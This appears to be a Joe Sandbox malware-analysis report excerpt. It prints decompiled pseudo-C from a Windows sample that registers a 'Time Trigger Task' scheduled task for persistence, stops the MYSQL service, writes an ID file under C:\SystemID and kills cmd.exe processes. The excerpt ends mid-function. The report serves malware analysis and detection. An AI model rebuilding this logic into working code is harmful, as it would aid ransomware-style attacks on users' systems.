0x00418084
0x00418086
0x00418089
0x00418089
0x00418095
0x004180a1
0x00418097
0x00418099
0x0041809c
0x0041809c
0x004180a6
0x004180b9
0x004180be
0x004180c1
0x004180c1
0x004180c8
0x004180ca
0x004180ca
0x004180d0
0x004180d6
0x004180d2
0x004180d2
0x004180d2
0x004180da
0x004180e9
0x0041830a
0x0041830a
0x004180da
0x00418311
0x00418314
0x00418318
0x0041832a
0x0041832e
0x00418335
0x0041831a
0x0041831d
0x00418327
0x00418327
0x00418318
0x0041804f
0x00418022

APIs

_memmove.LIBCMT ref: 004180B9
_memmove.LIBCMT ref: 00418124
_memmove.LIBCMT ref: 004181A8
_memmove.LIBCMT ref: 00418221
_memmove.LIBCMT ref: 00418288
_memmove.LIBCMT ref: 004182C6
_memmove.LIBCMT ref: 00418305

Strings

string too long, xrefs: 00418338
invalid string position, xrefs: 00418342

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: _memmove
String ID: invalid string position$string too long
API String ID: 4104443479-4289949731
Opcode ID: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction ID: bf4c3c4c16418921af35957e8a842e40232b78bc4dd53ff6fdc572851f10e90f
Opcode Fuzzy Hash: 72cc4f69e8dc9d7bd856fc9c1b9749c6ccd7664eafd668a19730564a7e917932
Instruction Fuzzy Hash: 4AC19F71700209EFDB18CF48C9819EE77A6EF85704B24492EE891CB741DB34ED968B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040DAC0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 160
comstringCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E0040DAC0(char _a4, intOrPtr _a24) {
				intOrPtr _v8;
				intOrPtr _v16;
				void* _v20;
				void* _v24;
				void* _v28;
				void* _v32;
				void* _v36;
				char _v40;
				char _v44;
				intOrPtr _v60;
				intOrPtr _v76;
				short _v84;
				intOrPtr _v88;
				char _v92;
				short _v20572;
				void* _t61;
				intOrPtr* _t63;
				intOrPtr* _t65;
				intOrPtr* _t67;
				intOrPtr* _t69;
				intOrPtr* _t71;
				intOrPtr* _t73;
				intOrPtr* _t75;
				intOrPtr* _t83;
				intOrPtr* _t85;
				intOrPtr* _t87;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t98;
				intOrPtr* _t100;
				intOrPtr _t129;

				 *[fs:0x0] = _t129;
				_t61 = E0042F7C0(0x504c);
				_v8 = 0;
				__imp__CoInitialize(0,  *[fs:0x0], 0x4ca948, 0xffffffff);
				if(_t61 >= 0) {
					__imp__CoCreateInstance(0x4d4f6c, 0, 1, 0x4d4f3c,  &_v24);
					_t63 = _v24;
					_push( &_v20);
					_push(0x4d4f8c);
					_push(0x4d4f9c);
					_push(L"Time Trigger Task");
					_push(_t63);
					if( *((intOrPtr*)( *_t63 + 0x20))() != 0) {
						_t98 = _v24;
						 *((intOrPtr*)( *_t98 + 0x1c))(_t98, L"Time Trigger Task");
						_t100 = _v24;
						 *((intOrPtr*)( *_t100 + 0x20))(_t100, L"Time Trigger Task", 0x4d4f9c, 0x4d4f8c,  &_v20);
					}
					_t65 = _v20;
					 *((intOrPtr*)( *_t65))(_t65, 0x4cf2e8,  &_v36);
					_t67 = _v36;
					 *((intOrPtr*)( *_t67 + 0x18))(_t67, 0, 1);
					_t69 = _v20;
					 *((intOrPtr*)( *_t69))(_t69, 0x4d4f7c,  &_v44);
					_t71 = _v20;
					 *((intOrPtr*)( *_t71 + 0x78))(_t71, 0x500078, 0);
					_t73 = _v20;
					_t122 =  >=  ? _a4 :  &_a4;
					 *((intOrPtr*)( *_t73 + 0x80))(_t73,  >=  ? _a4 :  &_a4);
					_t75 = _v20;
					 *((intOrPtr*)( *_t75 + 0x88))(_t75, L"--Task");
					_t78 =  >=  ? _a4 :  &_a4;
					lstrcpyW( &_v20572,  >=  ? _a4 :  &_a4);
					PathRemoveFileSpecW( &_v20572);
					_t83 = _v20;
					 *((intOrPtr*)( *_t83 + 0x90))(_t83,  &_v20572);
					_t85 = _v20;
					 *((intOrPtr*)( *_t85 + 0x48))(_t85, L"Comment");
					_t87 = _v20;
					_v28 = 0;
					_v32 = 0;
					_v40 = 0;
					 *((intOrPtr*)( *_t87 + 0xc))(_t87,  &_v40,  &_v28);
					E0042B420( &_v92, 0, 0x30);
					_v88 = 0xb07e2;
					_v92 = 0x30;
					_t129 = _t129 + 0xc;
					_v84 = 1;
					_t93 = _v28;
					_v76 = 0x21000c;
					_v60 = 0;
					 *((intOrPtr*)( *_t93 + 0xc))(_t93,  &_v92);
					_t95 = _v20;
					 *((intOrPtr*)( *_t95))(_t95, 0x4cf2e8,  &_v32);
					_t97 = _v32;
					_t61 =  *((intOrPtr*)( *_t97 + 0x18))(_t97, 0, 0);
					__imp__CoUninitialize();
				}
				if(_a24 >= 8) {
					_t61 = L00422587(_a4);
				}
				 *[fs:0x0] = _v16;
				return _t61;
			}

0x0040dad6
0x0040dadd
0x0040dae4
0x0040daeb
0x0040daf3
0x0040db0b
0x0040db11
0x0040db17
0x0040db18
0x0040db1d
0x0040db24
0x0040db29
0x0040db2f
0x0040db31
0x0040db3c
0x0040db3f
0x0040db58
0x0040db58
0x0040db5b
0x0040db6a
0x0040db6c
0x0040db76
0x0040db79
0x0040db88
0x0040db8a
0x0040db97
0x0040db9a
0x0040dba4
0x0040dbac
0x0040dbb2
0x0040dbbd
0x0040dbca
0x0040dbd6
0x0040dbe3
0x0040dbe9
0x0040dbf6
0x0040dbfc
0x0040dc07
0x0040dc0a
0x0040dc11
0x0040dc1b
0x0040dc22
0x0040dc2d
0x0040dc38
0x0040dc42
0x0040dc49
0x0040dc4d
0x0040dc55
0x0040dc5c
0x0040dc5f
0x0040dc66
0x0040dc71
0x0040dc74
0x0040dc83
0x0040dc85
0x0040dc8f
0x0040dc92
0x0040dc92
0x0040dc9c
0x0040dca1
0x0040dca6
0x0040dcac
0x0040dcb6

APIs

CoInitialize.OLE32(00000000), ref: 0040DAEB
CoCreateInstance.OLE32(004D4F6C,00000000,00000001,004D4F3C,?,?,004CA948,000000FF), ref: 0040DB0B
lstrcpyW.KERNEL32 ref: 0040DBD6
PathRemoveFileSpecW.SHLWAPI(?,?,?,?,?,?,004CA948,000000FF), ref: 0040DBE3
_memset.LIBCMT ref: 0040DC38
CoUninitialize.OLE32 ref: 0040DC92

Strings

Comment, xrefs: 0040DBFF
--Task, xrefs: 0040DBB5
Time Trigger Task, xrefs: 0040DB24, 0040DB34, 0040DB52

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CreateFileInitializeInstancePathRemoveSpecUninitialize_memsetlstrcpy
String ID: --Task$Comment$Time Trigger Task
API String ID: 330603062-1376107329
Opcode ID: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction ID: 3ca8ca325a9fd4b6db29fab4a8cd6851ae340f1496bb62272076f21ffc706129
Opcode Fuzzy Hash: 4f76096c1bb55b8fd6772bfaf79823c9e02c83c8f45e810a8838bdd484e9cb7f
Instruction Fuzzy Hash: E051F670A40209AFDB00DF94CC99FAE7BB9FF88705F208469F505AB2A0DB75A945CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00411A10 Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 63
servicesleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411A10() {
				long _v8;
				intOrPtr _v12;
				intOrPtr _v28;
				struct _SERVICE_STATUS _v32;
				void* _t9;
				int _t10;
				intOrPtr _t16;
				void* _t19;
				intOrPtr _t23;
				void* _t26;

				_t9 = OpenSCManagerW(0, 0, 1);
				_t19 = _t9;
				if(_t19 != 0) {
					_t10 = OpenServiceW(_t19, L"MYSQL", 0x20);
					_t26 = _t10;
					if(_t26 == 0) {
						L12:
						return _t10;
					}
					if(ControlService(_t26, 1,  &_v32) == 0) {
						L11:
						_t10 = CloseServiceHandle(_t19);
						goto L12;
					}
					if(QueryServiceStatus(_t26,  &_v32) == 0 || _v28 == 1) {
						L10:
						CloseServiceHandle(_t26);
						goto L11;
					} else {
						_t16 = _v12;
						do {
							_t23 = _t16;
							Sleep(_v8);
							if(QueryServiceStatus(_t26,  &_v32) == 0) {
								break;
							}
							_t16 = _v12;
						} while (_t16 >= _t23 && _v28 != 1);
						goto L10;
					}
				}
				return _t9;
			}

0x00411a1d
0x00411a23
0x00411a27
0x00411a32
0x00411a38
0x00411a3c
0x00411aa4
0x00000000
0x00411aa4
0x00411a54
0x00411aa0
0x00411aa1
0x00000000
0x00411aa3
0x00411a63
0x00411a9d
0x00411a9e
0x00000000
0x00411a6b
0x00411a6b
0x00411a70
0x00411a73
0x00411a75
0x00411a88
0x00000000
0x00000000
0x00411a8a
0x00411a8d
0x00000000
0x00411a97
0x00411a63
0x00411aa9

APIs

OpenSCManagerW.ADVAPI32(00000000,00000000,00000001), ref: 00411A1D
OpenServiceW.ADVAPI32(00000000,MYSQL,00000020), ref: 00411A32
ControlService.ADVAPI32(00000000,00000001,?), ref: 00411A46
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A5B
Sleep.KERNEL32(?), ref: 00411A75
QueryServiceStatus.ADVAPI32(00000000,?), ref: 00411A80
CloseServiceHandle.ADVAPI32(00000000), ref: 00411A9E
CloseServiceHandle.ADVAPI32(00000000), ref: 00411AA1

Strings

MYSQL, xrefs: 00411A2C

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Service$CloseHandleOpenQueryStatus$ControlManagerSleep
String ID: MYSQL
API String ID: 2359367111-1651825290
Opcode ID: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction ID: 28721974f2ef8f77e49d09c1c1511d7c7b7ffc9f5d452c27f8aea73f5df61dea
Opcode Fuzzy Hash: 692faa110e64916c7c56b6385ee5ad1bce035bf71229861a57ca5c091c1d7d7f
Instruction Fuzzy Hash: 7F117735A01209ABDB209BD59D88FEF7FACEF45791F040122FB08D2250D728D985CAA8

Uniqueness

Uniqueness Score: -1.00%

Function 0044F26C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 58
COMMON

Download Yara Rule

C-Code - Quality: 56%

			E0044F26C(void* __eflags, char _a4) {
				char _v16;
				char _v24;
				char _v44;
				intOrPtr _v52;
				char _v76;
				char _v84;
				char _v104;
				void* _t50;
				void* _t51;

				_t51 = _t50 - 0xc;
				E00430CFC( &_v16,  &_a4);
				_v16 = 0x4d6560;
				E00430ECA( &_v16, 0x508238);
				asm("int3");
				_push(_t50);
				E00430CFC( &_v44,  &_v24);
				_v44 = 0x4d6578;
				E00430ECA( &_v44, 0x508274);
				asm("int3");
				_push(_t51);
				E0044EF74( &_v76, _v52);
				E00430ECA( &_v76, 0x508320);
				asm("int3");
				_push(_t51 - 0xc);
				E00430CFC( &_v104,  &_v84);
				_v104 = 0x4d656c;
				E00430ECA( &_v104, 0x5082cc);
				asm("int3");
				return "bad function call";
			}

0x0044f26f
0x0044f27f
0x0044f28c
0x0044f294
0x0044f299
0x0044f29a
0x0044f2ad
0x0044f2ba
0x0044f2c2
0x0044f2c7
0x0044f2c8
0x0044f2d4
0x0044f2e2
0x0044f2e7
0x0044f2e8
0x0044f2fb
0x0044f308
0x0044f310
0x0044f315
0x0044f31b

APIs

std::exception::exception.LIBCMT ref: 0044F27F

Part of subcall function 00430CFC: std::exception::_Copy_str.LIBCMT ref: 00430D15

__CxxThrowException@8.LIBCMT ref: 0044F294

Part of subcall function 00430ECA: RaiseException.KERNEL32(?,?,?,<yP,?,?,?,?,?,00423B9C,?,0050793C,?,00000001), ref: 00430F1F

std::exception::exception.LIBCMT ref: 0044F2AD
__CxxThrowException@8.LIBCMT ref: 0044F2C2
std::regex_error::regex_error.LIBCPMT ref: 0044F2D4

Part of subcall function 0044EF74: std::exception::exception.LIBCMT ref: 0044EF8E

__CxxThrowException@8.LIBCMT ref: 0044F2E2
std::exception::exception.LIBCMT ref: 0044F2FB
__CxxThrowException@8.LIBCMT ref: 0044F310

Strings

bad function call, xrefs: 0044F316

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::exception::exception$Copy_strExceptionRaisestd::exception::_std::regex_error::regex_error
String ID: bad function call
API String ID: 2464034642-3612616537
Opcode ID: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction ID: b7a33952e270e61bb8336860f47bfa26d0287e47148adb1a9e07c7a629f44a3a
Opcode Fuzzy Hash: ed214ebb3701571be2f43069d920533da395f334550e3d3fd8b3428f3c6f404b
Instruction Fuzzy Hash: 60110A74D0020DBBCB04FFA5D566CDDBB7CEA04348F408A67BD2497241EB78A7498B99

Uniqueness

Uniqueness Score: -1.00%

Function 0040C740 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 254
COMMON

Download Yara Rule

C-Code - Quality: 88%

			E0040C740(char _a4, intOrPtr _a20, intOrPtr _a24) {
				struct _SECURITY_ATTRIBUTES* _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				signed int _v28;
				signed int _v32;
				intOrPtr _v36;
				struct _SECURITY_ATTRIBUTES* _v40;
				struct _SECURITY_ATTRIBUTES* _v56;
				char _v316;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t77;
				intOrPtr _t79;
				signed int _t86;
				void* _t92;
				void* _t95;
				void* _t96;
				signed int _t98;
				struct _SECURITY_ATTRIBUTES** _t101;
				DWORD* _t109;
				void* _t117;
				signed int _t121;
				intOrPtr _t123;
				intOrPtr* _t126;
				signed int _t127;
				signed int _t128;
				signed int _t138;
				intOrPtr _t141;
				signed int _t142;
				signed int _t143;
				intOrPtr _t144;
				signed int _t146;
				signed int _t147;
				signed int _t150;
				intOrPtr _t151;
				void* _t153;
				void* _t155;
				void* _t156;

				_push(0xffffffff);
				_push(0x4ca7b8);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t151;
				_v8 = 0;
				_t121 = 0;
				_t138 = 0;
				_v32 = 0;
				_t141 = 0;
				_v28 = 0;
				_v24 = 0;
				_v8 = 1;
				_t77 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "r");
				_t153 = _t151 - 0x130 + 8;
				_v20 = _t77;
				if(_t77 == 0) {
					L28:
					_t142 = _t121;
					if(_t121 == _t138) {
						L32:
						CreateDirectoryW(L"C:\\SystemID", 0);
						_t79 = E00420FDD(L"C:\\SystemID\\PersonalID.txt", "w");
						_t153 = _t153 + 8;
						_v20 = _t79;
						if(_t79 != 0) {
							_t143 = _t121;
							__eflags = _t121 - _t138;
							if(_t121 == _t138) {
								L47:
								__eflags = _a24 - 8;
								_t144 = _v20;
								_t81 =  >=  ? _a4 :  &_a4;
								_push(_t144);
								_push( >=  ? _a4 :  &_a4);
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_push("\n");
								E004228FD(_t121, _t135, _t138, _t144, __eflags);
								_push(_t144);
								_t79 = E00423A38(_t121, _t138, _t144, __eflags);
								_t153 = _t153 + 0x14;
								__eflags = _t121;
								if(_t121 == 0) {
									L54:
									if(_a24 >= 8) {
										_t79 = L00422587(_a4);
									}
									 *[fs:0x0] = _v16;
									return _t79;
								}
								_t146 = _t121;
								__eflags = _t121 - _t138;
								if(_t121 == _t138) {
									L53:
									_t79 = L00422587(_t121);
									_t153 = _t153 + 4;
									goto L54;
								}
								do {
									__eflags =  *((intOrPtr*)(_t146 + 0x14)) - 8;
									if( *((intOrPtr*)(_t146 + 0x14)) >= 8) {
										L00422587( *_t146);
										_t153 = _t153 + 4;
									}
									 *((intOrPtr*)(_t146 + 0x14)) = 7;
									 *(_t146 + 0x10) = 0;
									 *_t146 = 0;
									_t146 = _t146 + 0x18;
									__eflags = _t146 - _t138;
								} while (_t146 != _t138);
								goto L53;
							}
							_t123 = _v20;
							do {
								__eflags =  *((intOrPtr*)(_t143 + 0x14)) - 8;
								if(__eflags < 0) {
									_t86 = _t143;
								} else {
									_t86 =  *_t143;
								}
								_push(_t123);
								_push(_t86);
								E004228FD(_t123, _t135, _t138, _t143, __eflags);
								_t143 = _t143 + 0x18;
								_t153 = _t153 + 8;
								__eflags = _t143 - _t138;
							} while (_t143 != _t138);
							_t121 = _v32;
							goto L47;
						}
						L33:
						if(_t121 == 0) {
							goto L54;
						}
						_t147 = _t121;
						if(_t121 == _t138) {
							goto L53;
						}
						do {
							if( *((intOrPtr*)(_t147 + 0x14)) >= 8) {
								L00422587( *_t147);
								_t153 = _t153 + 4;
							}
							 *((intOrPtr*)(_t147 + 0x14)) = 7;
							 *(_t147 + 0x10) = 0;
							 *_t147 = 0;
							_t147 = _t147 + 0x18;
						} while (_t147 != _t138);
						goto L53;
					}
					while(1) {
						_t91 =  >=  ? _a4 :  &_a4;
						_t79 = E00414C60(_t142,  >=  ? _a4 :  &_a4, 0, _a20);
						if(_t79 != 0xffffffff) {
							goto L33;
						}
						_t142 = _t142 + 0x18;
						if(_t142 != _t138) {
							continue;
						}
						goto L32;
					}
					goto L33;
				}
				_t92 = E00420546(_t77);
				_t155 = _t153 + 4;
				_t158 = _t92;
				if(_t92 != 0) {
					L27:
					_push(_v20);
					E00423A38(_t121, _t138, _t141, _t166);
					_t153 = _t155 + 4;
					goto L28;
				} else {
					do {
						_push(_v20);
						_push(0x7e);
						_push( &_v316);
						_t95 = E00421101(_t121, _t138, _t141, _t158);
						_t156 = _t155 + 0xc;
						if(_t95 == 0) {
							goto L26;
						}
						_v36 = 7;
						_v40 = 0;
						_v56 = 0;
						if(_v316 != 0) {
							_t126 =  &_v316;
							_t135 = _t126 + 2;
							do {
								_t98 =  *_t126;
								_t126 = _t126 + 2;
								__eflags = _t98;
							} while (_t98 != 0);
							_t127 = _t126 - _t135;
							__eflags = _t127;
							_t128 = _t127 >> 1;
							goto L9;
						} else {
							_t128 = 0;
							L9:
							_push(_t128);
							_t129 =  &_v56;
							E00415C10(_t121,  &_v56, _t138, _t141,  &_v316);
							_t101 =  &_v56;
							_v8 = 2;
							if(_t101 >= _t138 || _t121 > _t101) {
								__eflags = _t138 - _t141;
								if(_t138 == _t141) {
									E00414F70(_t121,  &_v32, _t138, _t129);
									_t138 = _v28;
									_t121 = _v32;
								}
								__eflags = _t138;
								if(_t138 != 0) {
									 *((intOrPtr*)(_t138 + 0x14)) = 7;
									 *(_t138 + 0x10) = 0;
									 *_t138 = 0;
									__eflags = _v36 - 8;
									if(_v36 >= 8) {
										 *_t138 = _v56;
										_v56 = 0;
									} else {
										_t109 =  &(_v40->nLength);
										__eflags = _t109;
										if(_t109 != 0) {
											E004205A0(_t138,  &_v56, _t109 + _t109);
											_t156 = _t156 + 0xc;
										}
									}
									 *(_t138 + 0x10) = _v40;
									 *((intOrPtr*)(_t138 + 0x14)) = _v36;
									__eflags = 0;
									_v36 = 7;
									_v40 = 0;
									_v56 = 0;
								}
							} else {
								_t132 = _t101 - _t121;
								_t135 = 0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2;
								_t150 = (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * (_t101 - _t121) >> 0x20 >> 2);
								if(_t138 == _v24) {
									E00414F70(_t121,  &_v32, _t138, _t132);
									_t138 = _v28;
									_t121 = _v32;
								}
								_t117 = _t121 + (_t150 + _t150 * 2) * 8;
								if(_t138 != 0) {
									E00413160(_t138, _t117);
								}
							}
							_t138 = _t138 + 0x18;
							_v8 = 1;
							_v28 = _t138;
							if(_v36 >= 8) {
								L00422587(_v56);
								_t156 = _t156 + 4;
							}
							_t141 = _v24;
						}
						L26:
						_t96 = E00420546(_v20);
						_t155 = _t156 + 4;
						_t166 = _t96;
					} while (_t96 == 0);
					goto L27;
				}
			}

0x0040c743
0x0040c745
0x0040c750
0x0040c751
0x0040c761
0x0040c768
0x0040c76a
0x0040c76c
0x0040c76f
0x0040c771
0x0040c774
0x0040c781
0x0040c785
0x0040c78a
0x0040c78d
0x0040c792
0x0040c911
0x0040c911
0x0040c915
0x0040c944
0x0040c94b
0x0040c95b
0x0040c960
0x0040c963
0x0040c968
0x0040c9af
0x0040c9b1
0x0040c9b3
0x0040c9d8
0x0040c9d8
0x0040c9df
0x0040c9e2
0x0040c9e6
0x0040c9e7
0x0040c9e8
0x0040c9ed
0x0040c9ee
0x0040c9f3
0x0040c9f8
0x0040c9f9
0x0040c9fe
0x0040ca01
0x0040ca03
0x0040ca43
0x0040ca47
0x0040ca4c
0x0040ca51
0x0040ca59
0x0040ca64
0x0040ca64
0x0040ca05
0x0040ca07
0x0040ca09
0x0040ca3a
0x0040ca3b
0x0040ca40
0x00000000
0x0040ca40
0x0040ca10
0x0040ca10
0x0040ca14
0x0040ca18
0x0040ca1d
0x0040ca1d
0x0040ca22
0x0040ca29
0x0040ca30
0x0040ca33
0x0040ca36
0x0040ca36
0x00000000
0x0040ca10
0x0040c9b5
0x0040c9b8
0x0040c9b8
0x0040c9bc
0x0040c9c2
0x0040c9be
0x0040c9be
0x0040c9be
0x0040c9c4
0x0040c9c5
0x0040c9c6
0x0040c9cb
0x0040c9ce
0x0040c9d1
0x0040c9d1
0x0040c9d5
0x00000000
0x0040c9d5
0x0040c96a
0x0040c96c
0x00000000
0x00000000
0x0040c972
0x0040c976
0x00000000
0x00000000
0x0040c980
0x0040c984
0x0040c988
0x0040c98d
0x0040c98d
0x0040c992
0x0040c999
0x0040c9a0
0x0040c9a3
0x0040c9a6
0x00000000
0x0040c9aa
0x0040c920
0x0040c92c
0x0040c933
0x0040c93b
0x00000000
0x00000000
0x0040c93d
0x0040c942
0x00000000
0x00000000
0x00000000
0x0040c942
0x00000000
0x0040c920
0x0040c799
0x0040c79e
0x0040c7a1
0x0040c7a3
0x0040c906
0x0040c906
0x0040c909
0x0040c90e
0x00000000
0x0040c7b0
0x0040c7b0
0x0040c7b0
0x0040c7b9
0x0040c7bb
0x0040c7bc
0x0040c7c1
0x0040c7c6
0x00000000
0x00000000
0x0040c7ce
0x0040c7d5
0x0040c7dc
0x0040c7e7
0x0040c7ed
0x0040c7f3
0x0040c7f6
0x0040c7f6
0x0040c7f9
0x0040c7fc
0x0040c7fc
0x0040c801
0x0040c801
0x0040c803
0x00000000
0x0040c7e9
0x0040c7e9
0x0040c805
0x0040c805
0x0040c80d
0x0040c810
0x0040c815
0x0040c818
0x0040c81e
0x0040c861
0x0040c863
0x0040c869
0x0040c86e
0x0040c871
0x0040c871
0x0040c874
0x0040c876
0x0040c87a
0x0040c881
0x0040c888
0x0040c88b
0x0040c88f
0x0040c8ac
0x0040c8ae
0x0040c891
0x0040c894
0x0040c894
0x0040c895
0x0040c89f
0x0040c8a4
0x0040c8a4
0x0040c895
0x0040c8b8
0x0040c8be
0x0040c8c1
0x0040c8c3
0x0040c8ca
0x0040c8d1
0x0040c8d1
0x0040c824
0x0040c82b
0x0040c82f
0x0040c837
0x0040c83c
0x0040c842
0x0040c847
0x0040c84a
0x0040c84a
0x0040c850
0x0040c855
0x0040c85a
0x0040c85a
0x0040c855
0x0040c8d5
0x0040c8d8
0x0040c8e0
0x0040c8e3
0x0040c8e8
0x0040c8ed
0x0040c8ed
0x0040c8f0
0x0040c8f0
0x0040c8f3
0x0040c8f6
0x0040c8fb
0x0040c8fe
0x0040c8fe
0x00000000
0x0040c7b0

APIs

Part of subcall function 00420FDD: __wfsopen.LIBCMT ref: 00420FE8

_fgetws.LIBCMT ref: 0040C7BC
_memmove.LIBCMT ref: 0040C89F
CreateDirectoryW.KERNEL32(C:\SystemID,00000000), ref: 0040C94B

Strings

C:\SystemID\PersonalID.txt, xrefs: 0040C77C, 0040C956
C:\SystemID, xrefs: 0040C946

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CreateDirectory__wfsopen_fgetws_memmove
String ID: C:\SystemID$C:\SystemID\PersonalID.txt
API String ID: 2864494435-54166481
Opcode ID: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction ID: 3a80d152ee3a33a632d987be3a831cd6f981e29f6d1810208bb328cacc5ceb60
Opcode Fuzzy Hash: fb686944b339c976eacea12c72b2cba8865104c98ae0a1a06473ea49a68c22d9
Instruction Fuzzy Hash: 449193B2E00219DBCF20DFA5D9857AFB7B5AF04304F54463BE805B3281E7799A44CB99

Uniqueness

Uniqueness Score: -1.00%

Function 00412440 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 52
processCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00412440() {
				char _v524;
				long _v552;
				void* _v560;
				void* __ebx;
				void* __edi;
				void* __esi;
				int _t8;
				int _t11;
				void* _t17;
				void* _t18;
				void* _t19;
				void* _t21;

				_t18 = CreateToolhelp32Snapshot(0xf, 0);
				_v560 = 0x22c;
				_push( &_v560);
				_t8 = Process32FirstW(_t18);
				_t17 = CloseHandle;
				if(_t8 == 0) {
					L7:
					return CloseHandle(_t18);
				}
				_push(_t19);
				do {
					_t11 = E00420235(_t17, _t18, _t19,  &_v524, L"cmd.exe");
					_t21 = _t21 + 8;
					if(_t11 == 0) {
						_t19 = OpenProcess(1, _t11, _v552);
						if(_t19 != 0) {
							TerminateProcess(_t19, 9);
							CloseHandle(_t19);
						}
					}
				} while (Process32NextW(_t18,  &_v560) != 0);
				goto L7;
			}

0x00412455
0x00412457
0x00412467
0x00412469
0x0041246f
0x00412477
0x004124cc
0x004124d4
0x004124d4
0x00412479
0x00412480
0x0041248c
0x00412491
0x00412496
0x004124a7
0x004124ab
0x004124b0
0x004124b7
0x004124b7
0x004124ab
0x004124c7
0x00000000

APIs

CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 0041244F
Process32FirstW.KERNEL32(00000000,0000022C), ref: 00412469
OpenProcess.KERNEL32(00000001,00000000,?), ref: 004124A1
TerminateProcess.KERNEL32(00000000,00000009), ref: 004124B0
CloseHandle.KERNEL32(00000000), ref: 004124B7
Process32NextW.KERNEL32(00000000,0000022C), ref: 004124C1
CloseHandle.KERNEL32(00000000), ref: 004124CD

Strings

cmd.exe, xrefs: 00412486

Memory Dump Source

Source File: 00000001.00000002.281265111.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.286120325.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.286124704.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_400000_bP5g4FsSJk.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID: cmd.exe
API String ID: 2696918072-723907552
Opcode ID: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction ID: b239e8364e8e77cb7af63d5752a1eab109cf3eb7ce5fcb3b526656d556a9da04
Opcode Fuzzy Hash: 577ed8ed9705958fd2e422ac99cb6a94193351d2856dfe9262a659f2a85694a3
Instruction Fuzzy Hash: ED0192355012157BE7206BA1AC89FAF766CEB08714F0400A2FD08D2141EA6489408EB9

Uniqueness

Uniqueness Score: -1.00%

Function 0040F310 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 311
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E0040F310(void* __edi, void* __esi, char _a4, signed int _a20, intOrPtr _a24) {
				signed int _v8;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v28;
				char _v32;
				intOrPtr _v36;
				signed int _v40;
				short _v56;
				intOrPtr _v60;
				signed int _v64;
				short _v80;
				intOrPtr _v84;
				signed int _v88;
				char _v104;
				void* __ebx;
